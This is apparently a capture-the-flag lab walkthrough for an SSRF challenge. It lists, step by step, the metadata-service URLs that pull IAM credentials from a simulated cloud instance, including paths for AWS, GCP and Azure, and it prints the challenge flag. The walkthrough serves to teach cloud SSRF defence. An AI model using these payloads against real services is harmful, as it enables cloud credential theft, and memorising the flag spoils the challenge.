Step 1: Click on the green button to Start the Lab
Step 2: Hack the URL or IP of the lab
Step 3: Use your skills and logic to find the flags!
Server-Side Request Forgery (SSRF) vulnerabilities allow attackers to make HTTP requests from the server to internal services. One of the most critical targets in cloud environments is the AWS EC2 metadata service at 169.254.169.254, which can expose IAM credentials, instance information, and other sensitive data.
http://<target-ip>
to access the SecureScan Pro service (hosted on port 80)Test URLs:
http://169.254.169.254/
http://169.254.169.254/latest/
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/
http://169.254.169.254/latest/meta-data/
URL: http://169.254.169.254/latest/meta-data/
ami-id
hostname
instance-id
instance-type
local-hostname
local-ipv4
public-hostname
public-ipv4
security-groups
iam/
Step 1: http://169.254.169.254/latest/meta-data/iam/
Step 2: http://169.254.169.254/latest/meta-data/iam/security-credentials/
Step 3: http://169.254.169.254/latest/meta-data/iam/security-credentials/WebServerRole
Expected JSON Response:
{
"Code" : "Success",
"LastUpdated" : "2025-08-06T12:00:00Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "AKIA...",
"SecretAccessKey" : "wJalrXUtnFEMI...",
"Token" : "AQoDYXdzEJr...",
"Expiration" : "2025-08-06T18:00:00Z",
"Challenge_Flag" : "117c287d-efb6-4e42-9292-51e180367855",
"Note" : "SSRF Challenge Completed!"
}
117c287d-efb6-4e42-9292-51e180367855
http://169.254.169.254/latest/meta-data/iam/security-credentials/WebServerRole
http://169.254.169.254/latest/user-data (instance startup script)
http://169.254.169.254/latest/meta-data/instance-id
http://169.254.169.254/latest/meta-data/security-groups
http://169.254.169.254/latest/meta-data/ (real AWS)
http://metadata.google.internal/computeMetadata/v1/ (GCP)
http://169.254.169.254/metadata/instance (Azure)
This SSRF challenge demonstrates one of the most critical attack vectors in cloud environments: exploiting SSRF vulnerabilities to access AWS EC2 metadata services. By simulating the AWS metadata endpoint structure, the challenge teaches how attackers can steal IAM credentials, instance information, and other sensitive cloud configuration data. Understanding this attack vector is crucial for securing cloud applications and implementing proper SSRF protections in AWS environments.
Sign-in to your account to access your hacking courses and cyber security labs.
Access all hacking courses and cyber security labs.